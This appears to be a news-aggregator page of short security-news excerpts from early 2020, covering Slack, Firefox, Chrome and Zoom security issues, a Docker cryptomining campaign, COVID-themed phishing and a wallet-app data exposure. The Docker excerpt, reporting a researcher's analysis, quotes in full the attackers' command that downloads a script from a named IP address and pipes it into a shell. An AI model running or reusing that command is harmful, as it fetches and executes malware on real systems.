image
As the coronavirus pandemic continues to worsen, remote-collaboration platforms – now fixtures in many workers’ “new normal” – are facing more scrutiny. Popular video-conferencing app Zoom may currently be in the cybersecurity hot seat, but other collaboration tools, such as Slack, Trello, WebEx and Microsoft Teams, are certainly not immune from cybercriminal attention. For organizations leaning on these platforms, security should be top of mind. A failure to lock down Slack et al could lead to data breaches, brand damage, malware infestations and more. Researchers say that attackers are hard at work looking for new weaknesses to achieve all of the latter. Fortunately though, best practices can go a long way to shrinking the risk. Collaboration App Security Bugs: Not Hypothetical The risk posed by collaboration platforms is far from hypothetical. In March, for example a critical vulnerability was found in Slack, which could allow automated account takeovers (ATOs) and lead to data breaches. According to a HackerOne bug-bounty report, a HTTP Request Smuggling bug, in a proof-of-concept, was used to force open-redirects within Slack, leading users to a rogue client outfitted with Slack domain cookies. When victims attached to the malicious client, their session cookies could be harvested and later used to take over accounts. The attack could also be automated. “Automated account takeover attacks, like Slack just had to deal with, are pervasive,” said Jason Kent,…

Source

image
Mozilla patched two Firefox browser zero-day vulnerabilities actively being exploited in the wild. The flaws, both use-after-free bugs, have been part of “targeted attacks in the wild,” according to a Mozilla Foundation security advisory posted Friday. Both bugs have critical ratings and allow remote attackers to execute arbitrary code or trigger crashes on machines running Firefox 74.0.1 and its business-friendly Firefox Extended Support Release 68.6.1. The bugs impact Firefox browser versions running on Windows, macOS and Linux operating systems. Details are scant on how either bug (CVE-2020-6819 and CVE-2020-6820) are specifically being exploited by adversaries. Tracked as CVE-2020-6819, this bug is a use-after free vulnerability tied to the browser component “nsDocShell destructor”. The Firefox nsDocShell is a client of the nsI-HttpChannel API, a function of the browser related to reading HTTP headers. The second vulnerability, tracked as CVE-2020-6820, is also a use-after-free bug actively being exploited in the wild. In this case, the attackers are targeting the Firefox browser component ReadableStream, an interface of the Streams API. The Streams API is “responsible for breaking a resource that you want to receive over a network down into small chunks,” according to Mozilla. Bugs were reported by security researchers Francisco Alonso and Javier Marcos of JMP Security. “There is still lots of work to do and more details to be published (including other browsers). Stay…

Source

image
The Docker cloud containerization technology is under fire, with an organized, self-propagating cryptomining campaign targeting misconfigured open Docker Daemon API ports. Thousands of container-compromise attempts are being observed every day as part of the campaign, according to Gal Singer, a security researcher at AquaSec. The effort has been ongoing for months. However, since the beginning of the year, the number of daily attempts has far exceeded what was seen before, he said. “We…believe that these attacks are directed by actors with sufficient resources and the infrastructure needed to carry out and sustain such attacks, and that this is not an improvised endeavor,” he wrote, in an analysis posted on Friday. Kinsing’s Infection Routine The attack pattern starts with the attackers identifying a misconfigured Docker API port that has been left open to the public internet. They then access that open port and the Docker instance connected to it, and run a rogue Ubuntu container. The container issues a command that fetches the Kinsing malware, which in turn downloads and runs a cryptominer. In the final stage of the infection, Kinsing attempts to propagate to other containers and hosts. Click to enlarge: A summary of the attack components. Source: AquaSec. The same initial command is used in every attack, according to Singer: “/bin/bash -c apt-get update && apt-get install -y wget cron;service cron start; wget -q -O – 142.44.191.122/d.sh | sh;tail -f /dev/null.” This…

Source

image
A group of tech giants – including Akamai, Amazon Web Services, Cloudflare, Facebook, Google, Microsoft and Netflix – are banding together to battle route hijacking, route leaks and IP address-spoofing attacks targeting internet users. They’re coming together under a program was introduced this week by the Mutually Agreed Norms for Routing Security (MANRS) global initiative. MANRS over the past six years has worked to build up a team of 300 network operators, internet exchange points (IXPs) and other companies to provide “crucial fixes to reduce the most common routing threats.” MANRS’ latest program brings in content delivery networks (CDNs), like Akamai and Cloudflare, which are geographically distributed groups of servers that provide quick delivery of internet content worldwide. Also included are cloud providers like Microsoft and AWS, which offer network services, infrastructure or cloud-based applications via the internet or private interconnections. Members in the program are tasked with taking specific steps to improve the resilience and security of the routing infrastructure. The internet routing process is complex; exchanged traffic for instance runs on Border Gateway Protocol (BGP), a protocol that joins different networks together to build a “roadmap” of the internet. BGP however does not have built-in validation mechanisms, which can expose businesses to attacks such as route hijacking, route injection attacks, IP address spoofing and more, which allow…

Source

image
Researchers have discovered threat actors once again capitalizing on the COVID-19 pandemic and current attention on the World Health Organization (WHO) with a new spearphishing email designed to spread the LokiBot trojan sent using the WHO trademark as a lure. Researchers at FortiGuard Labs on March 27 first observed the malicious COVID-19-themed scam, which claims to be from the WHO and attempts to address misinformation related to the pandemic to convince users it’s authentic. Instead, it sends an attachment that unleashes the infostealer LokiBot if downloaded and executed, according to a blog post published Thursday by threat analyst Val Saengphaibul. “The body of the email contains multiple points about infection control and other suggestions and recommendations, which is obviously a lure to further compel the recipient to continue reading,” he wrote in the post. “And in a twisted fashion, the messaging pretends to address misinformation related to COVID-19/Coronavirus.” While the message, written in English, has legitimate characteristics, the threat actors behind it likely do not speak English as a first language due to “some obvious grammatical, punctuation and spelling issues,” Saengphaibul pointed out. The message also makes an obvious blunder by saying it is from the WHO Center for Disease Control, linking the Switzerland-based WHO to the U.S. Center for Disease Control (CDC)—two entirely separate organizations. Moreover, in the body of the message, the author…

Source

image
On Thursday, Google released security patches to stomp out high-severity vulnerabilities in its Chrome browser. Patches for all the bugs Google disclosed in its security advisory roll out over the next few days. Overall, eight security bugs were addressed in Chrome browser version 80.0.3987.162 for Windows, Mac, and Linux. The most severe of these flaws could allow for arbitrary code execution, according to the Center for Internet Security (CIS). “Successful exploitation of the most severe of these vulnerabilities could allow an attacker to execute arbitrary code in the context of the browser,” according to CIS in a Wednesday alert. “Depending on the privileges associated with the application, an attacker could view, change, or delete data. If this application has been configured to have fewer user rights on the system, exploitation of the most severe of these vulnerabilities could have less impact than if it was configured with administrative rights.” As is typical for Chrome updates, Google is initially scant in details of the bugs “until a majority of users are updated with a fix.” It did outline three of the vulnerabilities that were discovered by external researchers, however. These included two high-severity vulnerabilities the WebAudio component of Chrome (CVE-2020-6450 and CVE-2020-6451). The WebAudio component is used for processing and synthesizing audio in web applications. The flaws tied to CVE-2020-6450 and CVE-2020-6451 are both use-after-free flaws. Use…

Source

image
Zoom has nixed a feature that came under fire for “undisclosed data mining” of users’ names and email addresses, used to match them with their LinkedIn profiles. The feature, the LinkedIn Sales Navigator, is a LinkedIn service used for sales prospecting. When users enter a web conference meeting, the tool automatically sent their user names and email addresses to an Zoom internal company system. This system would then match this data to their LinkedIn profiles, according to a New York Times investigation. Per The New York Times, the tool also automatically allowed other meeting participants to covertly access this LinkedIn profile data, without Zoom asking for users’ permission or notifying them. That means if a user is in a Zoom meeting – even if they aren’t using their real names – other participants could collect information about their real names, locations, employer names and job titles. The tool was removed on Thursday as part of several sweeping changes Zoom made in response to snowballing security and privacy concerns. Zoom founder Eric Yuan said in a Wednesday post responding to the concerns that Zoom will freeze the development of its features and instead focusing on security and privacy issues. “Over the next 90 days, we are committed to dedicating the resources needed to better identify, address and fix issues proactively,” said Yuan. “We are also committed to being transparent throughout this process. We want to do what it takes to maintain your trust.” With…

Source

image
Phishing attacks looking to take advantage of interest and fear around the COVID-19 health crisis are becoming a pandemic themselves – and apparently cybercriminals are looking to conserve resources by leaning on their older stockpiles of weapons to keep the infection wave going. Or Katz, a researcher at Akamai, said in a posting on Thursday that older phishing kits that were previously deployed and then retired are being pressed back into service in order to target those working from home. In fact, Akamai researchers have seen recycled phishing kits from as far back as July being used in coronavirus-based phishing attacks now. Millions of Americans are telecommuting due to self-isolation, mandated quarantine or corporate policies as coronavirus infections continue to spike. Akamai’s team, like many others in the security community, has recently observed phishing attacks that start with SMS messages or emails that direct victims to domains “seemingly related to COVID-19 news, governmental updates, or health-related products and services.” In the latest attacks, which have been seen globally, victims that click the link are directed to one domain and then immediately redirected to yet another. The second domain spoofs big brands like Microsoft, Orange France and eBay, or health resources such as the World Health Organization or local medical experts. “By pretending to be an insurance company, bank, medical expert or other trusted brand, criminals are convincing victims to…

Source

image
As the Coronavirus pandemic continues to force people to work from home, countless companies are now holding daily meetings using videoconferencing services from Zoom. But without the protection of a password, there's a decent chance your next Zoom meeting could be "Zoom bombed" — attended or disrupted by someone who doesn't belong. And according to data gathered by a new automated Zoom meeting discovery tool dubbed "zWarDial," a crazy number of meetings at major corporations are not being protected by a password. zWarDial, an automated tool for finding non-password protected Zoom meetings. According to its makers, zWarDial can find on average 110 meetings per hour, and has a success rate of around 14 percent. Each Zoom conference call is assigned a Meeting ID that consists of 9 to 11 digits. Naturally, hackers have figured out they can simply guess or automate the guessing of random IDs within that space of digits. Security experts at Check Point Research did exactly that last summer, and found they were able to predict approximately four percent of randomly generated Meeting IDs. The Check Point researchers said enabling passwords on each meeting was the only thing that prevented them from randomly finding a meeting. Zoom responded by saying it was enabling passwords by default in all future scheduled meetings. Zoom also said it would block repeated attempts to scan for meeting IDs, and that it would no longer automatically indicate if a meeting ID was valid or invalid….

Source

image
Key Ring, creator of a digital wallet app used by 14 million people across North America, has exposed 44 million IDs, charge cards, loyalty cards, gift cards and membership cards to the open internet, researchers say. The Key Ring app allows users to upload scans and photos of various physical cards into a digital folder on a user’s phone. While Key Ring is primarily designed for storing membership cards for loyalty programs, users also store more sensitive cards on the app. According to the research team at vpnMentor, it found 44 million scans exposed in a misconfigured cloud database that included: Government IDs, retail club membership and loyalty cards, NRA membership cards, gift cards, credit cards with all details exposed (including CVV numbers), medical insurance cards and medical marijuana ID cards, among others. vpnMentor said that it found a total of five misconfigured Amazon Web Services (AWS) S3 cloud databases owned by the company. These could have revealed millions of these uploads to anyone with a web browser, thanks to a lack of password-protection on the buckets, the company said. Also, every file could also be downloaded and stored offline. Threatpost reached out to Key Ring’s media team multiple times over the last few days for a comment or reaction to the findings, with no response — and will update this post with any additional information should the company eventually respond. Five Databases of Information According to the research, launched Thursday…

Source